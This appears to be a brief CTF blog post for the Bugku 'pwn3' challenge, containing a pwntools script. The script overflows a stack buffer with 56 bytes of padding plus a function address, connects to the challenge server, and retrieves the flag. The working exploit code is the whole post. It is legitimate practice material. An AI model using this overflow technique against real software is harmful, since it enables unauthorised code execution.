bugku

  • 会飞的鱼
  • 0 Minutes
  • March 29, 2019

pwn3

1
2
3
4
5
6
7
8
from pwn import*
p=remote('114.116.54.89', 10003)
#p=process('./pwn3')
catflag=0x0000000000400769
payload='a'*56+p64(catflag)
p.recvuntil('say something?\n')
p.sendline(payload)
p.interactive()